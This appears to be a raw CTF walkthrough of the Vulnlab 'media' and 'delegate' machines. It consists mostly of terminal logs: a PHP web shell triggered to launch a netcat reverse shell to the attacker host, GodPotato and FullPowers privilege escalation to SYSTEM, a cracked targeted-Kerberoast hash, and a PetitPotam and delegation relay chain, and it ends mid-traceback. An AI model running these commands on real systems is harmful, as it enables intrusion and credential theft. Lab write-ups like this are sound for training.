enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*   
           C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y                                                                                                                                                      enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..                                           

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp> powershell                                      
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp>  iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe 
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe

upload the shell.php again ( with same name ) on the website http://media.vl

trigger the shell

──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443

.

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


C:\xampp\htdocs>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp> 

having another listening running

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185                                    Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled


C:\Windows\system32>cd c:\temp 
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
 .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052


and having again another listener running

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>hostname
hostname
MEDIA

C:\temp>

That’s it

Tools used on this box:

GodPotato

FullPowers

ntlm_theft

 

 

.

 

vulnlab-delegate

vulnlab-delegate

a hard machine

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
                                          

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck             
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

        5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\> 


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

Bloodhound to get more info

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169      
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 07S

Upload data to Bloodhound, we find

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd targetedKerberoast                                         
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls                       
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt  LICENSE  README.md  requirements.txt  targetedKerberoast.py  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
  Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip---
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/targetedKerberoast]
└─$ 

....

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341       (?)     
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq  
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10

.

a new tool ( dnstool , printerbug )

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git

Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                                                    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate          
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv
                                                                                                                   
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket          
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
                                                                                                                     


.

new tools ( bloodyad.py , addspn.py & PetitPotam.py)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD              
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..      
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl             
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ 

Below the bloodyAD installed in Python Virtual Enviroment (  i had troubles with dependicies)

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
Traceback (most recent call last):
